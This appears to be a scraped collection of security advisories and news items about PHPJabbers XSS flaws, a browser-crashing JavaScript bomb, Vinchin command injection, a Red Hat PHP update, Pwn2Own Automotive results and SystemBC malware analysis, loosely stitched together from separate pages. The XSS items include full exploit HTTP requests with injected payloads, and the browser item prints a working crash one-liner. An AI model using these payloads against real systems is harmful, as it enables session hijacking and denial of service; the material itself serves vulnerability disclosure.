Interactive Floor Plan version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking## Author: nu11secur1ty## Date: 01/28/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the action request parameter is copied into the HTMLdocument as plain text between tags. The payload epe7x<img src=aonerror=alert(1)>aagqb was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal session cookies etc.STATUS: HIGH - Vulnerability[+]Exploit:```GETGET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqbHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.809339229.1706427310;_gid=GA1.2.1556395590.1706427310; _gat=1;_fbp=fb.1.1706427309936.1280956215;_ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html)## Time spent:00:35:00

Interactive Floor Plan 1.0 Cross Site Scripting

Chrome version 121 suffers from a javascript fork malloc vulnerability that indicates memory corruption upon crash.

    Searching the web for `javascript fork malloc bomb` returns results,e.g. [here][1]: and [here][2]:We got a javascript fork malloc bomb which crashed Chrome 121 on linuxwith SIGILL and about one in five runs the virtual machine freezes.SIGILL almost always is a sign of memory corruption :)On android it crashes the current tab without explanation.Firefox 121 on linux also crashes the current tab.In all cases except the sporadic freezes, the browser remains functioning,not counting the crashed tab.The javscript code is simply simple:`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`[Online demo][3]: In case someone wants to test it on other browsersor debug.The GNU/linux tests took about 1.5 minutes in a virtual machine with4GB RAM and single core.[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript[3]: https://www.guninski.com/fork1.html

Chrome 121 Javascript Fork Malloc Bomb

PHPJ Callback Widget version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking## Author: nu11secur1ty## Date: 01/26/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/callback-widget/## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The Callback Requests function is vulnerable to javascript injection.The malicious user from everywhere can send an XSs-stored exploit codeto the admin panel, and then when the admin visits the API CallbackRequests function he will immediately activate the exploitation of themalicious actor. This is so fun, thanks for watching the PoC video. =)BRSTATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1Host: demo.phpjabbers.comCookie: _ga=GA1.2.2069938240.1692907228;_fbp=fb.1.1705479327501.84379277;_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84Content-Length: 322Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://demo.phpjabbers.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, iConnection: closereason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)## Time spent:00:15:00

PHPJ Callback Widget 1.0 Cross Site Scripting

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

**MiniZinc 2.7.6 Null Pointer**

Posted Jan 29, 2024

Authored by Meng Ruijie

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

tags | advisory

advisories | CVE-2023-46050

SHA-256 | a80cb0270b834776631af2ca8f8daa61229fb0418cf1801a697093adfbf995c9

Download | Favorite | View

**MiniZinc 2.7.6 Null Pointer**

    [Vulnerability description]A null pointer deference existed in MiniZinc v.2.7.6 via a crafted Preferences.json file.[VulnerabilityType Other]null pointer deference[Vendor of Product]MiniZinc[Affected Product Code Base]MiniZinc - 2.7.6[Reference]https://github.com/MiniZinc/libminizinc/issues/729[CVE Reference]The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46050 to this vulnerability.

**File Tags**

*   ActiveX (932)
*   Advisory (83,946)
*   Arbitrary (16,508)
*   BBS (2,859)
*   Bypass (1,810)
*   CGI (1,031)
*   Code Execution (7,521)
*   Conference (685)
*   Cracker (843)
*   CSRF (3,365)
*   DoS (24,223)
*   Encryption (2,377)
*   Exploit (52,460)
*   File Inclusion (4,241)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,819)
*   Intrusion Detection (902)
*   Java (3,111)
*   JavaScript (884)
*   Kernel (6,899)
*   Local (14,626)
*   Magazine (586)
*   Overflow (12,942)
*   Perl (1,429)
*   PHP (5,167)
*   Proof of Concept (2,359)
*   Protocol (3,677)
*   Python (1,585)
*   Remote (31,191)
*   Root (3,610)
*   Rootkit (517)
*   Ruby (615)
*   Scanner (1,646)
*   Security Tool (7,948)
*   Shell (3,224)
*   Shellcode (1,216)
*   Sniffer (898)
*   Spoof (2,236)
*   SQL Injection (16,468)
*   TCP (2,420)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,325)
*   Web (9,813)
*   Whitepaper (3,763)
*   x86 (966)
*   XSS (18,088)
*   Other

**File Archives**

*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,058)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,953)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,425)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,371)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (14,947)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,245)
*   UNIX (9,356)
*   UnixWare (187)
*   Windows (6,620)
*   Other

MiniZinc 2.7.6 Null Pointer

By Deeba Ahmed
Vendors have 90 days to release security patches before Trend Micro publicly discloses it.
This is a post from HackRead.com Read the original post: Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own Automotive

Pwn2Own Automotive 2024 took place in Tokyo, Japan, from January 24 to 26.

Pwn2Own Automotive 2024, a three-day contest organized by Trend Micro’s Zero Day Initiative, saw competitors earn $1,323,750 for hacking Tesla twice and discovering 49 zero-day bugs in EV systems.

Synacktiv Team won the contest, earning $450,000 in cash for hacking a Tesla car twice, gaining root permissions, and demonstrating a sandbox escape in the Tesla infotainment system. They also demonstrated two-bug chains against Ubiquiti Connect and JuiceBox 40 Smart EV Stations. Second on the list was fuzzware.io for received $177,500. In third place were Midnight Blue/PHP Hooligans with $80,000 in rewards.

Participants earned over $700,000 on the first day, including $60,000 for EV charger hacks and $40,000 for infotainment system and Tesla modem hacks. The second day saw the Automotive Grade Linux exploit earning the biggest reward of $35,000, while EV charger exploits earned teams $30,000. On the third day, researchers received $60,000 for an Emporia EV charger exploit and $30,000 each for other exploits, resulting in payouts ranging from $20,000 to $26,000.

Here, are the prominent happenings and results from all three days of the contest.

On the first day, researchers discovered vulnerabilities in Tesla’s modem, Sony’s infotainment systems, and Alpine’s car audio players, collectively earning $722,500 in awards for identifying three bug collisions and 24 zero-day exploits.

The NCC Group EDG team won $70,000 for exploiting zero-day bugs to hack Pioneer DMH-WT7600NEX and Phoenix Contact CHARX SEC-3100 EV chargers. Sina Kheirkhah, Tobias Scharnowski, and Felix Buchmann attacked ChargePoint Home Flex and Sony XAV-AX5500, earning $60,000 and $40,000, respectively.

Synacktiv Team successfully exploited Tesla Modem and JuiceBox 40 Smart EV charging stations, while the PCAutomotive Team exploited Alpine Halo9 iLX-F509.

On Day 2, Team Tortuga successfully exploited a known bug in a 2-bug chain against the ChargePoint Home Flex, earning $5,000 and 3 Master of Pwn Points. The Midnight Blue / PHP Hooligans team also used a known bug in a 3-bug chain to exploit the Phoenix Contact CHARX SEC-3100, earning $30,000 and 6 Master of Pwn Points.

PCAutomotive couldn’t exploit the JuiceBox 40 Smart EV Charging Station whereas Katsuhiko Sato successfully attacked the Sony XAV-AX5500, earning $10,000 and 2 Master of Pwn Points.

Computest Sector 7 successfully targeted the JuiceBox 40 Smart EV Charging Station for a known bug, earning $15,000 and 3 Master of Pwn Points. Sina Kheirkhah failed to exploit the Autel MaxiCharger AC Wallbox Commercial, while Synacktiv and NCC Group EDG successfully exploited the Tesla Infotainment System and Alpine Halo9 iLX-F509, using a 2-bug chain, earning $100,000 and $20,000, respectively.

Synacktiv earned $35,000 and 5 Master of Pwn Points using a 3-bug chain, while Le Tran Hai Tung earned $20,000 and 4 Master of Pwn Points using a 2-bug chain. Sina Kheirkhah and Alex Olson failed to get their exploits working, while fuzzware.io earned $30,000 and 6 Master of Pwn Points using a stack-based buffer overflow. RET2 Systems also earned $30,000 and 6 Master of Pwn Points using a stack-based buffer overflow.

Day 3 saw Computest Sector 7 exploiting the ChargePoint Home Flex and earning $30,000 and 6 Master of Pwn Points using a 2-bug chain. Synacktiv successfully exploited the Sony XAV-AX5500, earning $20,000 and 4 Master of Pwn Points. Katsuhiko Sato failed to exploit the Pioneer DMH-WT7600NEX.

Sina Kheirkhah attacked the Ubiquiti Connect EV, earning $30,000 and 6 Master of Pwn Points. fuzzware.io exploited the Phoenix Contact CHARX SEC-3100, earning $22,500 and 4.5 Master of Pwn Points.

Nettitude’s Connor Ford exploited the JuiceBox 40 Smart EV Charging Station, using a stack-based buffer overflow, earning $30,000 and 6 Master of Pwn Points. Team Cluck exploited the Phoenix Contact CHARX SEC-3100, earning $26,250 and 5.25 Master of Pwn Points.

Vendors have 90 days to release security patches before Trend Micro publicly discloses it.

****_RELATED ARTICLES_****

1.  6 of the Best Crypto Bug Bounty Programs
2.  Bug bounty: Hack Tesla Model 3 to win your own Model 3
3.  Pwn2Own 2023: Tesla Model 3, Windows 11, Ubuntu Pwned

Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own Automotive

Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in SystemHandler.class.php.

    CVE ID: CVE-2024-22903Title: Command Injection Vulnerability in SystemHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and EarlierDescription:A significant security vulnerability, CVE-2024-22903, has been identified in the `deleteUpdateAPK` function within the `SystemHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, designed to delete APK files, is prone to a command injection vulnerability due to improper handling of input parameters.Function Analysis:- The function extracts `md5` and `file_name` parameters from user input.- It includes a check for an empty `file_name`, but lacks adequate validation or sanitization for the input used in constructing system commands.- The command to delete the specified APK file, built using the `file_name` parameter, is executed via the `exec` function, leading to a security vulnerability.Exploitation Risk:Attackers can exploit this flaw by inserting malicious commands in the `file_name` parameter. When this parameter is processed by the vulnerable function, the injected commands are executed on the server, presenting a severe risk of unauthorized access or control.Current Status:As of the latest information, there is no known patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery.Recommendation:Users are urged to be vigilant and to monitor Vinchin for any security updates. Until a patch is released, implementing additional security controls and closely monitoring system activity is crucial for mitigating the risk posed by this vulnerability.Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 SystemHandler.class.php Command Injection

Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in the syncNtpTime function.

    CVE ID: CVE-2024-22899Title: Command Injection Vulnerability in Vinchin Backup and Recovery's syncNtpTime Function in Versions 7.2 and EarlierDescription:A critical security vulnerability, identified as CVE-2024-22899, has been discovered in the `syncNtpTime` function of Vinchin Backup and Recovery software. This issue affects versions 7.2 and earlier. The function, part of the `SystemHandler.class.php` file, is designed for synchronizing system time with NTP servers but is prone to a command injection vulnerability due to improper handling of user input.Function Analysis:- The function is responsible for handling the `ntphost` parameter, which is expected to contain the address of the NTP server.- The vulnerability stems from the direct concatenation of this parameter into a system command line, without adequate validation or sanitization.- This design flaw allows an attacker to inject arbitrary commands into the `ntphost` parameter, which are then executed by the system.Current Status:As of now, there is no patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup and Recovery. Users of these versions are at risk of exploitation.Recommendation:It is advised for users of Vinchin Backup and Recovery versions 7.2 and earlier to remain alert and monitor for updates from Vinchin. Once a patch becomes available, it should be applied immediately to mitigate the risk posed by this vulnerability.Conclusion:The discovery of CVE-2024-22899 underscores the importance of rigorous input validation and sanitization in software development. This vulnerability poses a severe security risk, potentially leading to unauthorized system access or control.Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 syncNtpTime Command Injection

Red Hat Security Advisory 2024-0387-03 - An update for the php:8.1 module is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0387.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: php:8.1 security update  
Advisory ID:        RHSA-2024:0387-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0387  
Issue date:         2024-01-24  
Revision:           03  
CVE Names:          CVE-2023-0567  
====================================================================

Summary: 

An update for the php:8.1 module is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.

Security Fix(es):

* php: 1-byte array overrun in common path resolve code (CVE-2023-0568)

* php: DoS vulnerability when parsing multipart request body (CVE-2023-0662)

* php: Missing error check and insufficient random bytes in HTTP Digest authentication for SOAP (CVE-2023-3247)

* php: XML loading external entity without being enabled (CVE-2023-3823)

* php: phar Buffer mismanagement (CVE-2023-3824)

* php: Password_verify() always return true with some hash (CVE-2023-0567)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-0567

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2170761  
https://bugzilla.redhat.com/show_bug.cgi?id=2170770  
https://bugzilla.redhat.com/show_bug.cgi?id=2170771  
https://bugzilla.redhat.com/show_bug.cgi?id=2219290  
https://bugzilla.redhat.com/show_bug.cgi?id=2229396  
https://bugzilla.redhat.com/show_bug.cgi?id=2230101

Red Hat Security Advisory 2024-0387-03

Cybersecurity researchers have shed light on the command-and-control (C2) server of a known malware family called SystemBC.
"SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week.
The risk and

Cybersecurity researchers have shed light on the command-and-control (C2) server of a known malware family called **SystemBC**.

"SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week.

The risk and financial advisory solutions provider said it has witnessed an increase in the use of malware throughout Q2 and Q3 2023.

SystemBC, first observed in the wild in 2018, allows threat actors to remote control a compromised host and deliver additional payloads, including trojans, Cobalt Strike, and ransomware. It also features support for launching ancillary modules on the fly to expand on its core functionality.

A standout aspect of the malware revolves around its use of SOCKS5 proxies to mask network traffic to and from C2 infrastructure, acting as a persistent access mechanism for post-exploitation.

Customers who end up purchasing SystemBC are provided with an installation package that includes the implant executable, Windows and Linux binaries for the C2 server, and a PHP file for rendering the C2 panel interface, alongside instructions in English and Russian that detail the steps and commands to run.

The C2 server executables -- "server.exe" for Windows and "server.out" for Linux -- are designed to open up no less than three TCP ports for facilitating C2 traffic, inter-process communication (IPC) between itself and the PHP-based panel interface (typically port 4000), and one for each active implant (aka bot).

The server component also makes use of three other files to record information regarding the interaction of the implant as a proxy and a loader, as well as details pertaining to the victims.

The PHP-based panel, on the other hand, is minimalist in nature and displays a list of active implants at any given point of time. Furthermore, it acts as a conduit to run shellcode and arbitrary files on a victim machine.

"The shellcode functionality is not only limited to a reverse shell, but also has full remote capabilities that can be injected into the implant at runtime, while being less obvious than spawning cmd.exe for a reverse shell," Kroll researchers said.

The development comes as the company also shared an analysis of an updated version of DarkGate (version 5.2.3), a remote access trojan (RAT) that enables attackers to fully compromise victim systems, siphon sensitive data, and distribute more malware.

"The version of DarkGate that was analyzed shuffles the Base64 alphabet in use at the initialization of the program," security researcher Sean Straw said. "DarkGate swaps the last character with a random character before it, moving from back to front in the alphabet."

Kroll said it identified a weakness in this custom Base64 alphabet that makes it trivial to decode the on-disk configuration and keylogging outputs, which are encoded using the alphabet and stored within an exfiltration folder on the system.

"This analysis enables forensic analysts to decode the configuration and keylogger files without needing to first determine the hardware ID," Straw said. "The keylogger output files contain keystrokes stolen by DarkGate, which can include typed passwords, composed emails and other sensitive information."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SystemBC Malware's C2 Server Analysis Exposes Payload Delivery Tricks

By Deeba Ahmed
Bug Bounty Bonanza: Hackers Rake in Big Bucks as Connected Cars Show Security Cracks.
This is a post from HackRead.com Read the original post: Pwn2Own Automotive: Tesla, Sony, Alpine Players Breached on Day One

Pwn2Own Automotive 2024 takes place in Tokyo, Japan, from January 24 to 26.

The Pwn2Own Automotive 2024 hacking contest, taking place in Tokyo, Japan from January 24 to January 26, focuses on loopholes in automotive technologies. Tesla is the contest’s sponsor with VicOne and Trend Micro’s Zero Day Initiative as co-hosts.

During the context, they will demonstrate zero-day exploits targeting Model 3/Y or Model S/X systems, including the infotainment, modem, tuner, wireless, and autopilot systems. The top prize for zero-day exploits will be $200,000 and a Tesla car.

On its first day, many vulnerabilities were highlighted, including weaknesses in Tesla’s modem, Sony’s infotainment systems, and Alpine’s car audio players, raising concerns about the security of connected vehicles.

Security researchers hacked multiple fully patched EV charging stations and infotainment systems. The NCC Group EDG team won $70,000 for hacking the Pioneer DMH-WT7600NEX infotainment system and the Phoenix Contact CHARX SEC-3100 EV charger exploiting zero days.  

Sina Kheirkhah successfully attacked ChargePoint Home Flex, earning $60,000 and six Master of Pwn Points. Tobias Scharnowski and Felix Buchmann attacked Sony XAV-AX5500 for $40,000 and four Master of Pwn Points. Gary Li Wang exploited the Sony XAV-AX5500 using a stack-based buffer overflow.

Security researchers successfully hacked a Tesla Modem and earned $722,500 in total in awards for identifying three bug collisions and 24 unique zero-day exploits. Synacktiv Team completed a 3-bug chain against Tesla Modem and JuiceBox 40 Smart EV Charging Station, earning $100,000 and $60,000 along with 10 and 6 Master of Pwn Points, respectively.

This means, the team chained three zero-day bugs to gain root permissions on a Tesla Modem. The Synacktiv Team also successfully attacked the Ubiquiti Connect EV Station, earning six Master of Pwn Points and $60,000.

A third exploit chain targeted the ChargePoint Home Flex EV charger, which earned security researchers $16,000 in cash and $295,000 in prizes.

The PCAutomotive Team successfully targeted the Alpine Halo9 iLX-F509 using a UAF exploit, earning $40,000 and 4 Master of Pwn Points. They discovered a vulnerability in Alpine’s car audio player, allowing arbitrary code execution. This could potentially give attackers control over the audio system, allowing them to play loud noises or inject malicious code into other connected systems.

RET2 Systems also achieved 6 Master of Pwn Points and $60,000 for exploiting a 2-bug chain against the Phoenix Contact CHARX SEC-3100. The PHP Hooligans / Midnight Blue team successfully targeted a Sony XAV-AX5500, earning $20,000.

For additional insights on Pwn2Own Automotive’s day 1 results, check out Zero Day Initiative’s blog.

The Pwn2Own exploits highlight the growing vulnerability of cars to cyberattacks due to the increasing integration of technology in vehicles. While researchers disclose their findings to help manufacturers fix vulnerabilities, car owners must remain vigilant.

****_RELATED ARTICLES_****

1.  6 of the Best Crypto Bug Bounty Programs
2.  Bug bounty: Hack Tesla Model 3 to win your own Model 3
3.  Pwn2Own 2023: Tesla Model 3, Windows 11, Ubuntu Pwned

Tag

#php